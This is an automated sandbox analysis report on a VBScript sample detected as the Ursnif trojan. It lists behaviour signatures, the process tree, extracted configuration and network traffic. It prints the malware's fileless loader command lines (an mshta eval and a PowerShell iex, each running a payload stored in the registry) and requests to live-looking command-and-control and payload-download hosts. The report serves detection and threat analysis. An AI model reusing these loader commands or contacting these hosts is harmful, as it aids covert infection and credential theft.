
Analysis Report 6znkPyTAVN7V.vbs

Overview

General Information

Sample Name: 6znkPyTAVN7V.vbs
Analysis ID: 321068
MD5: a5f063ac8cf23a274922a337a8eeac2c
SHA1: bfae866c96996f9d26ec356ea2b48caa8e2b64d7
SHA256: 2dd9418ae38f181b5901be316cbb0deaa2205b2865a3c391105966b7d48fae2f

Detection

Ursnif
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for dropped file
Benign windows process drops PE files
Found malware configuration
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Dot net compiler compiles file from suspicious location
VBScript performs obfuscated calls to suspicious functions
Yara detected Ursnif
Allocates memory in foreign processes
Changes memory attributes in foreign processes to executable or writable
Compiles code for process injection (via .Net compiler)
Creates a thread in another existing process (thread injection)
Creates processes via WMI
Deletes itself after installation
Disables SPDY (HTTP compression, likely to perform web injects)
Found Tor onion address
Hooks registry keys query functions (used to hide registry keys)
Injects code into the Windows Explorer (explorer.exe)
Machine Learning detection for dropped file
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the export address table of user mode modules (user mode EAT hooks)
Modifies the import address table of user mode modules (user mode IAT hooks)
Modifies the prolog of user mode functions (user mode inline hooks)
Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)
Sigma detected: MSHTA Spawning Windows Shell
Sigma detected: Suspicious Csc.exe Source File Folder
Suspicious powershell command line found
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to steal Mail credentials (via file access)
Uses nslookup.exe to query domains
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Compiles C# or VB.Net code
Contains capabilities to detect virtual machines
Contains functionality to call native functions
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file does not import any functions
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for the Microsoft Outlook file path
Tries to load missing DLLs
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Startup

  • System is w10x64
  • wscript.exe (PID: 7100 cmdline: C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\6znkPyTAVN7V.vbs' MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)
  • iexplore.exe (PID: 6592 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)
    • iexplore.exe (PID: 6584 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6592 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
    • iexplore.exe (PID: 7016 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6592 CREDAT:17420 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
  • mshta.exe (PID: 6732 cmdline: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\Actidsrv'));if(!window.flag)close()</script>' MD5: 197FC97C6A843BEBB445C1D9C58DCBDB)
    • powershell.exe (PID: 1040 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi)) MD5: 95000560239032BC68B4C2FDFCDEF913)
      • conhost.exe (PID: 5288 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • csc.exe (PID: 6468 cmdline: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\41myt1z4\41myt1z4.cmdline' MD5: B46100977911A0C9FB1C3E5F16A5017D)
        • cvtres.exe (PID: 6248 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES2F3F.tmp' 'c:\Users\user\AppData\Local\Temp\41myt1z4\CSC9757D2D6F9F84ABABCD57DA7E4EFF939.TMP' MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)
      • csc.exe (PID: 1604 cmdline: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\dvgqxizg\dvgqxizg.cmdline' MD5: B46100977911A0C9FB1C3E5F16A5017D)
        • cvtres.exe (PID: 4532 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES4817.tmp' 'c:\Users\user\AppData\Local\Temp\dvgqxizg\CSC2062E18B5949488FB5158C917D4EBA9.TMP' MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)
  • control.exe (PID: 4456 cmdline: C:\Windows\system32\control.exe -h MD5: 625DAC87CB5D7D44C5CA1DA57898065F)
    • explorer.exe (PID: 3440 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
      • cmd.exe (PID: 6620 cmdline: cmd /C 'nslookup myip.opendns.com resolver1.opendns.com > C:\Users\user\AppData\Local\Temp\9047.bi1' MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
        • conhost.exe (PID: 2916 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • nslookup.exe (PID: 3424 cmdline: nslookup myip.opendns.com resolver1.opendns.com MD5: AF1787F1DBE0053D74FC687E7233F8CE)
  • cleanup

Malware Configuration

Threatname: Ursnif

{"server": "730", "os": "10.0_0_17134_x64", "ip": "84.17.52.25*", "version": "250157", "uptime": "250", "system": "71d3df7c602bda1335102fc2c9a1d3ef", "crc": "3d255", "action": "00000001", "id": "2200", "time": "1605897760", "user": "3d11f4f58695dc15e71ab15cfb0b75a9", "soft": "1"}

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000003.00000003.414828910.0000000004D58000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security |
00000016.00000003.506842838.000002656DBD0000.00000004.00000001.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security |
00000003.00000003.414892314.0000000004D58000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security |
0000001F.00000003.509721795.00000000027B0000.00000004.00000001.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security |
00000003.00000003.423836026.0000000004BDB000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security |
(5 of 18 entries shown)

Sigma Overview

System Summary:

Sigma detected: Dot net compiler compiles file from suspicious location
Source: Process started | Author: Joe Security | Data: Command: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\41myt1z4\41myt1z4.cmdline', CommandLine: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\41myt1z4\41myt1z4.cmdline', CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi)), ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 1040, ProcessCommandLine: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\41myt1z4\41myt1z4.cmdline', ProcessId: 6468
Sigma detected: MSHTA Spawning Windows Shell
Source: Process started | Author: Michael Haag | Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi)), CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi)), CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\Actidsrv'));if(!window.flag)close()</script>', ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 6732, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi)), ProcessId: 1040
Sigma detected: Suspicious Csc.exe Source File Folder
Source: Process started | Author: Florian Roth | Data: Command: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\41myt1z4\41myt1z4.cmdline', CommandLine: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\41myt1z4\41myt1z4.cmdline', CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi)), ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 1040, ProcessCommandLine: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\41myt1z4\41myt1z4.cmdline', ProcessId: 6468

Signature Overview


AV Detection:

Antivirus detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\earmark.avchd | Avira: detection malicious, Label: TR/Crypt.XDR.Gen
Found malware configuration
Source: explorer.exe.3440.31.memstr | Malware Configuration Extractor: Ursnif {"server": "730", "os": "10.0_0_17134_x64", "ip": "84.17.52.25*", "version": "250157", "uptime": "250", "system": "71d3df7c602bda1335102fc2c9a1d3ef", "crc": "3d255", "action": "00000001", "id": "2200", "time": "1605897760", "user": "3d11f4f58695dc15e71ab15cfb0b75a9", "soft": "1"}
Multi AV Scanner detection for domain / URL
Source: c56.lepini.at | Virustotal: Detection: 12%
Source: api3.lepini.at | Virustotal: Detection: 10%
Source: api10.laptok.at | Virustotal: Detection: 12%
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\earmark.avchd | ReversingLabs: Detection: 45%
Multi AV Scanner detection for submitted file
Source: 6znkPyTAVN7V.vbs | Virustotal: Detection: 13%
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\earmark.avchd | Joe Sandbox ML: detected
Source: C:\Windows\explorer.exe | Code function: 31_2_04DE37B8 FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,31_2_04DE37B8
Source: C:\Windows\explorer.exe | Code function: 31_2_04E091A0 CreateFileA,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,31_2_04E091A0
Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user\AppData
Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user\AppData\Local
Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user
Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user\Documents\desktop.ini
Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user\Desktop\desktop.ini
Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user\AppData\Local\Temp

Networking:

Found Tor onion address
Source: powershell.exe, 00000016.00000003.506842838.000002656DBD0000.00000004.00000001.sdmp | String found in binary or memory: ADVAPI32.DLLCryptGetUserKeyKERNEL32.DLLLoadLibraryExWWS2_32.DLLWSARecvWSASendclosesocketrecvCHROME.DLLsoft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%xversion=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s&ip=%s&os=%s%u.%u_%u_%u_x%u&tor=1Mozilla/5.0 (Windows NT %u.%u%s; rv:82.0) Gecko/20100101 Firefox/82.0; Win64; x64http://https://file://USER.ID%lu.exe/upd %luCopyright (c) 2009 Microsoft Corporation.Software\AppDataLow\Software\Microsoft\MainBlockTempClientSystemIniKeysScrKillLastTaskLastConfigCrHookEdHookOpHookExec.onionTorClientTorCrc%s %s HTTP/1.1
Source: control.exe, 0000001C.00000002.562589004.0000000000C0E000.00000004.00000001.sdmp | String found in binary or memory: ADVAPI32.DLLCryptGetUserKeyKERNEL32.DLLLoadLibraryExWWS2_32.DLLWSARecvWSASendclosesocketrecvCHROME.DLLsoft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%xversion=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s&ip=%s&os=%s%u.%u_%u_%u_x%u&tor=1Mozilla/5.0 (Windows NT %u.%u%s; rv:82.0) Gecko/20100101 Firefox/82.0; Win64; x64http://https://file://USER.ID%lu.exe/upd %luCopyright (c) 2009 Microsoft Corporation.Software\AppDataLow\Software\Microsoft\MainBlockTempClientSystemIniKeysScrKillLastTaskLastConfigCrHookEdHookOpHookExec.onionTorClientTorCrc%s %s HTTP/1.1
Source: explorer.exe, 0000001F.00000003.509721795.00000000027B0000.00000004.00000001.sdmp | String found in binary or memory: ADVAPI32.DLLCryptGetUserKeyKERNEL32.DLLLoadLibraryExWWS2_32.DLLWSARecvWSASendclosesocketrecvCHROME.DLLsoft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%xversion=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s&ip=%s&os=%s%u.%u_%u_%u_x%u&tor=1Mozilla/5.0 (Windows NT %u.%u%s; rv:82.0) Gecko/20100101 Firefox/82.0; Win64; x64http://https://file://USER.ID%lu.exe/upd %luCopyright (c) 2009 Microsoft Corporation.Software\AppDataLow\Software\Microsoft\MainBlockTempClientSystemIniKeysScrKillLastTaskLastConfigCrHookEdHookOpHookExec.onionTorClientTorCrc%s %s HTTP/1.1
Uses nslookup.exe to query domains
Source: unknown | Process created: C:\Windows\System32\nslookup.exe nslookup myip.opendns.com resolver1.opendns.com
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\nslookup.exe nslookup myip.opendns.com resolver1.opendns.com
Source: global traffic | HTTP traffic detected: GET /jvassets/xI/t64.dat HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: c56.lepini.at
Source: Joe Sandbox View | IP Address: 47.241.19.44 47.241.19.44
Source: Joe Sandbox View | ASN Name: CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC
Source: global traffic | HTTP traffic detected: GET /api1/_2B3RKwW/iUs9mOE_2Fy587oYC_2FhiP/cqwrXVzOiN/3iy_2FEQhtiU4caUY/vWPEHIJ26Cxh/hxAwM2tWDkS/qSV4R5vbQ5WIYO/vg5dj3B7tqHn_2B5lMt8g/ZCmUbWqqhg2tfb6o/oSVPWNxkppLXqHK/vV8NxeiuEcG4zeTrzv/QP7ToNFgg/ooAdhPJGl1OBQCmkIaFe/emmxLHFFXg9hJQ1rXN3/R0lYYQ4mDPy013_2BEN29K/KCxOU_2Fu7g0U/2_2FUAD4/FmM_2B3LZkNPjT_0A_0Duh_/2Fckmk1sZB/GylmdmeslwIeJNcsI/5j5juAVhdr/efpdipqa/_2B HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: api10.laptok.atConnection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /favicon.ico HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: api10.laptok.atConnection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /api1/V1DBpeXcd2SVjySIO/8hTgDrr844Y9/FkNwDrqNmFQ/9oPqk4MIOokEEO/lAj4retEL8hBWD_2B0pxU/T7oLkBnwilwgrQ1C/AvHVEHenvUSVrMm/ORNvMXPydgnOdjqkcE/7xobo7HTI/u73jkfr_2FjHMJCI9rY_/2BjBbFYZ7F0eTv_2F_2/BYfIj0Dy67ek7AsPxEOFXL/T0hfdBRqc_2Fe/6YdiM0Di/NVBY3QI9vCDaT6RZ7Z_2Bsp/Tf56xI5YR0/r4h0IdnvWama32P8r/O_0A_0DQ7_2F/xwdj748yuth/QipPLmYlZrUIFf/ItsP98kSmplqzXo_2FbHs/x1amFzzsXuM/2v_2FCbB0Kb/f HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: api10.laptok.atConnection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /favicon.ico HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: api10.laptok.atConnection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /api1/QdpN8R1Zxydo1sWwz/dLDbxLZDRc0K/NqGQWShgOQF/J_2BAL2WZ8_2BO/wleDsz6XPtrejMXvExKU_/2B47KheFhTVz6OHb/U8BHNRse2TRbQUl/t4VunRcZuRVr1P5Yn8/vdcf8SUP6/tiGlFE6jFupRpiPfDk7q/1tiJD_2B3O0KnOAOHpk/hj_2B_2BJ_2FTygogOh927/rHfuAtp29MX7x/A_2B0dM4/eZkJa3YiO8U7UX1dLO9738r/QF_2FAV_2B/2P7sELH5zi9v_2FVk/N6T6tg_2Fhv_/0A_0DGou2O0/txLMOZmvcHnBqh/tXlcbpB0l_2B98Y5d82fD/5OpvYLLEKf7MUfb_/2BVb4feXqkslzZ/1 HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: api10.laptok.atConnection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /jvassets/xI/t64.dat HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: c56.lepini.at
Source: global traffic | HTTP traffic detected: GET /api1/MGm_2BawPNnqv/qfARarLc/23L5WAJpq6aA5FcNoQawOw8/WY2g8fAdL6/NUu66E7OS0R_2BG57/OXAVzJZbFn8X/_2FSC9D9K6b/AbdxtvT02SkSw7/ZkCvirGXx0HM0tRJhZYZ_/2FwisZmcZhXU6gZ7/74WQUBqLJvkFLgc/o4J6CeVWx8F4FYZhHJ/7gzbcqiqM/JXYzTaXO4suSoccFx6OR/YQyFoZyErkPp2TAfMD9/L602sCubGMEbypmf_2BGCc/ZHk9_2FkS_2BQ/fsEW1_0A/_0DfIoRZGv1JHMAUdavz6FH/UJEF6aAPh1/TyQo1G51CZuwSA_/2B4G HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:82.0) Gecko/20100101 Firefox/82.0Host: api3.lepini.at
Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmp | String found in binary or memory: <FavoriteIcon>http://www.facebook.com/favicon.ico</FavoriteIcon> equals www.facebook.com (Facebook)
Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmp | String found in binary or memory: <FavoriteIcon>http://www.myspace.com/favicon.ico</FavoriteIcon> equals www.myspace.com (Myspace)
Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmp | String found in binary or memory: <FavoriteIcon>http://www.rambler.ru/favicon.ico</FavoriteIcon> equals www.rambler.ru (Rambler)
Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmp | String found in binary or memory: <URL>http://www.facebook.com/</URL> equals www.facebook.com (Facebook)
Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmp | String found in binary or memory: <URL>http://www.rambler.ru/</URL> equals www.rambler.ru (Rambler)
Source: unknown | DNS traffic detected: queries for: api10.laptok.at
Source: unknown | HTTP traffic detected: POST /api1/2tB6HzcKS8r0WW7BAax/EpXwH5CwuRnFdJmKi5Wb0z/8L2XyFmuUk21U/q489sLw0/eYa15UFemmR_2B7v06lu5vZ/vv8LbddAYj/XqNowlO_2BXAYCqjQ/aD8hcjl_2FOt/pSFCqIQQoj_/2FMnv2bRbnt_2B/gat5l9a8xt_2BSKi_2BnF/Ycvl8NwzPykoI_2B/tPDx3U6gMTBe2j_/2B5pUjMJEk5uJWfdSo/hcLd6nUAU/DHphb1AEsxwfEaYhnZ7Z/1mtzQBAzvGMymAdx_2B/RxMGg_0A_0DDuMMHm1mDrd/9OXCQyyxJSC5W/eaK7kK7AE/tmjaexqRZ7OBc/X HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:82.0) Gecko/20100101 Firefox/82.0Content-Length: 2Host: api3.lepini.at
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 20 Nov 2020 09:41:43 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingContent-Encoding: gzipData Raw: 36 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f 2f 3d 33 af 02 59 4e 1f 66 9a 3e d4 25 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6a(HML),I310Q/Qp/K&T";Ct@}4l"(//=3YNf>%a30
Source: explorer.exe, 0000001F.00000000.545744038.00000000075A0000.00000002.00000001.sdmp | String found in binary or memory: http://%s.com
Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmp | String found in binary or memory: http://amazon.fr/
Source: explorer.exe, 0000001F.00000000.550538266.000000000D473000.00000004.00000001.sdmp | String found in binary or memory: http://api10.laptok.at/api1/V1DBpeXcd2SVjySIO/8hTgDrr844Y9/FkNwDrqNmFQ/9oPqk4MIOokEEO/lAj4retEL8hBWD
Source: explorer.exe, 0000001F.00000000.547816387.0000000008455000.00000004.00000001.sdmp | String found in binary or memory: http://api10.laptok.at/api1/_2B3RKwW/iUs9mOE_2Fy587oYC_2FhiP/cqwrXVzOiN/3iy_2FEQhtiU4caUY/vWPEHIJ26C
Source: explorer.exe, 0000001F.00000000.548344844.000000000854C000.00000004.00000001.sdmp | String found in binary or memory: http://api3.lepini.at/api1/2tB6HzcKS8r0WW7BAax/EpXwH5CwuRnFdJmKi5Wb0z/8L2XyFmuUk21U/q489sLw0/eYa15UF
Source: explorer.exe, 0000001F.00000000.548344844.000000000854C000.00000004.00000001.sdmp | String found in binary or memory: http://api3.lepini.at/api1/MGm_2BawPNnqv/qfARarLc/23L5WAJpq6aA5FcNoQawOw8/WY2g8fAdL6/NUu66E7OS0R_2BG
Source: explorer.exe, 0000001F.00000000.548486561.0000000008626000.00000004.00000001.sdmp | String found in binary or memory: http://api3.lepini.at:80
Source: explorer.exe, 0000001F.00000000.547816387.0000000008455000.00000004.00000001.sdmp | String found in binary or memory: http://api3.lepini.at:80/api1/2tB6HzcKS8r0WW7BAax/EpXwH5CwuRnFdJmKi5Wb0z/8L2XyFmuUk21U/q489sLw0/eYa1
Source: explorer.exe, 0000001F.00000000.548239180.000000000851A000.00000004.00000001.sdmp | String found in binary or memory: http://api3.lepini.at:80/api1/MGm_2BawPNnqv/qfARarLc/23L5WAJpq6aA5FcNoQawOw8/WY2g8fAdL6/NUu66E7OS0R_
Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmp | String found in binary or memory: http://ariadna.elmundo.es/
Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmp | String found in binary or memory: http://ariadna.elmundo.es/favicon.ico
Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmp | String found in binary or memory: http://arianna.libero.it/
Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmp | String found in binary or memory: http://arianna.libero.it/favicon.ico
Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmp | String found in binary or memory: http://asp.usatoday.com/
Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmp | String found in binary or memory: http://asp.usatoday.com/favicon.ico
Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmp | String found in binary or memory: http://auone.jp/favicon.ico
Source: explorer.exe, 0000001F.00000000.545744038.00000000075A0000.00000002.00000001.sdmp | String found in binary or memory: http://auto.search.msn.com/response.asp?MT=
Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmp | String found in binary or memory: http://br.search.yahoo.com/
Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmp | String found in binary or memory: http://browse.guardian.co.uk/
Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmp | String found in binary or memory: http://browse.guardian.co.uk/favicon.ico
Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmp | String found in binary or memory: http://busca.buscape.com.br/
Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmp | String found in binary or memory: http://busca.buscape.com.br/favicon.ico
Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmp | String found in binary or memory: http://busca.estadao.com.br/favicon.ico
Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmp | String found in binary or memory: http://busca.igbusca.com.br/
Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmp | String found in binary or memory: http://busca.igbusca.com.br//app/static/images/favicon.ico
Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmp | String found in binary or memory: http://busca.orange.es/
Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmp | String found in binary or memory: http://busca.uol.com.br/
Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmp | String found in binary or memory: http://busca.uol.com.br/favicon.ico
Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmp | String found in binary or memory: http://buscador.lycos.es/
Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmp | String found in binary or memory: http://buscador.terra.com.br/
Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmp | String found in binary or memory: http://buscador.terra.com/
Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmp | String found in binary or memory: http://buscador.terra.com/favicon.ico
